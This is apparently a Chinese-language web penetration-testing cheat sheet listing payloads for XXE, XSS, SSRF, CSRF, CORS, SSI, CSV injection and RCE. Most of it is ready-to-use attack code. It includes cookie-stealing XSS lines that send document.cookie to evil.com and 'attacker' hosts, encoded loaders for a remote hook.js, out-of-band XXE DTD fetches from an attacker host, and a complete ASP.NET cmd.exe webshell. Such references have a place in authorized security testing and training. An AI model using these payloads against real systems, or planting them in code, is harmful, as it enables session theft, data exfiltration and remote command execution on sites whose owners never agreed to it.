Web Fuzz
字数 1227 2025-08-27 12:33:48
Web安全测试技术全面指南
XXE (XML外部实体注入)测试方法
基础测试
- 测试XML解析功能:
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test "THIS IS A STRING!">]>
<methodCall><methodName>&test;</methodName></methodCall>
- 确认解析后尝试读取文件:
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<methodCall><methodName>&test;</methodName></methodCall>
- 使用PHP伪协议读取文件:
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
<methodCall><methodName>&test;</methodName></methodCall>
WebGoat测试方法
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<comment><text>&test;</text></comment>
带外(OOB)测试
- 基础测试:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://burp.collab.server" >]>
<foo>&xxe;</foo>
- 高级带外文件读取:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/lsb-release">
<!ENTITY % dtd SYSTEM "http://<evil attacker hostname>:8000/evil.dtd">
%dtd;
]>
<data>&send;</data>
- 使用FTP协议读取文件:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd">%asd;%c;]>
<a>&rrr;</a>
XSS (跨站脚本)测试方法
基础XSS测试
- 存储型XSS:
'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'
- 文件上传XSS:
.png
">.png
"><svg onmouseover=alert(1)>.svg
SVG XSS
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert('XSS!');</script>
</svg>
CSP绕过技术
- 绕过script-src self:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
- 常用payload:
svg/onload
'-alert(1)-'
eval(atob('YWxlcnQoMSk='))
<iMg SrC=x OnErRoR=alert(1)>
<div onmouseover="alert('XSS');">
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>
认证凭据窃取
- 窃取Cookie:
- 黑名单绕过:
eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))
- 替代方案:
<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>
<svg onload=fetch("//attacker/r.php?="%2Bcookie)>
SSRF (服务器端请求伪造)测试
基础测试
- 探测内网资产:
http://internal-server:22/notarealfile.txt
- 端口扫描技术:
- 根据响应时间判断端口开放情况
- 使用DNSLOG进行无回显测试
- 重点测试端口:
- 80, 8080, 443等常用端口
高级技术
- 路径测试:
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000&
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#
SQL注入测试
测试方法
- 使用SQLMap测试PUT请求:
sqlmap -r <file with request> -vvvv
- 双编码输入测试
会话固定测试
- 测试步骤:
- 访问登录页面,记录未认证用户的会话ID
- 登录系统
- 检查登录后会话ID是否与之前相同
- 如果相同,存在会话固定漏洞
CSRF (跨站请求伪造)测试
绕过技术
- JSON端点CSRF:
<html>
<script>
function jsonreq() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST","https://target.com/api/endpoint", true);
xmlhttp.setRequestHeader("Content-Type","text/plain");
xmlhttp.withCredentials = true;
xmlhttp.send(JSON.stringify({"test":"x"}));
}
jsonreq();
</script>
</html>
- CSRF转XSS:
<html>
<body>
<p>Please wait... ;)</p>
<script>
let host = 'http://target.com'
let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e'
let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E'
function submitRequest() {
var req = new XMLHttpRequest();
req.open(<CSRF components>);
req.setRequestHeader("Accept", "application/json");
req.withCredentials = true;
req.onreadystatechange = function () {
if (req.readyState === 4) {
executeXSS();
}
}
req.send();
}
function executeXSS() {
window.location.assign(host+'<URI with XSS>'+alert_payload);
}
submitRequest();
</script>
</body>
</html>
文件上传漏洞测试
测试方法
- 创建大文件测试上传限制(Mac OS):
mkfile -n 10g temp_10GB_file
- 空字节注入绕过:
filename="test.php%00.jpg"
CORS配置错误测试
POC测试
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText;
}
}
req.open("GET", "<site>", true);
req.withCredentials = true;
req.send();
}
</script>
</body>
</html>
心脏出血漏洞测试
测试方法
- 使用Nmap:
nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d
- 使用Python脚本:
python heartbleed-poc.py <target> -p <target port> | less
重定向漏洞测试
测试方法
- 基础测试:
data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==
- 其他payload:
http://;URL=javascript:alert('XSS')
data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
CRLF注入测试
测试方法
- 基础测试:
http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a
模板注入测试
AngularJS测试
<html>
<head>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script>
</head>
<body>
<div ng-app>{{constructor.constructor('alert(1)')()}}</div>
</body>
</html>
RCE (远程代码执行)测试
.NET Webshell
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e){}
string executeIt(string arg){
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdClick(object sender, System.EventArgs e){
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(executeIt(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD><title>REALLY NICE</title></HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
PHP匿名函数RCE
$inputFunc = function() use($a, $b, $c, &$f){echo(exec('whoami'));};
CSV注入测试
Excel CSV注入
=cmd|'cmd'!''
服务器端包含注入(SSI)测试
测试payload
<!--#printenv -->
<!--#exec cmd="cat /etc/passwd"-->
<pre><!--#exec cmd="ls" --></pre>
<pre><!--#echo var="DATE_LOCAL" --> </pre>
<pre><!--#exec cmd="whoami"--></pre>
<pre><!--#exec cmd="dir" --></pre>
点击劫持测试
POC测试
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="http://target.com" width="500" height="500"></iframe>
</body>
</html>
JSON参数测试
测试方法
- 使用Burp标记参数进行主动扫描
反序列化漏洞测试
测试工具
- Java反序列化扫描器Burp扩展
- Java序列化payload Burp扩展
- Ysoserial工具
JWT (JSON Web Tokens)测试
测试方法
- 使用Burp扩展捕获请求
- 发送到Repeater
- 点击JSON Web Tokens选项卡
- 使用随机密钥对签名
- 在Alg None Attack下选择攻击方式
- 查看会话是否仍然有效
LFI (本地文件包含)测试
测试方法
- 基础文件包含:
http://target.com/page.php?file=../../../../etc/passwd
子域名探测技术
常用方法
- 使用DNS枚举工具
- 证书透明度日志查询
- 搜索引擎查询
- 暴力破解常见子域名
实用脚本
网站可用性监控
while true; do
/usr/bin/wget "http://[target]/uri/path" --timeout 30 -O - 2>/dev/null | grep "[item on page]" || echo "The site is down";
sleep 10;
done
IDOR (不安全的直接对象引用)测试
测试方法
- 修改对象ID参数
- 测试水平权限控制
- 测试垂直权限控制
以上是Web安全测试的全面技术指南,涵盖了从XXE、XSS到SSRF、CSRF等多种常见漏洞的测试方法和技术。在实际测试中,应根据目标系统的具体情况选择合适的测试方法,并遵守合法合规的原则进行安全测试。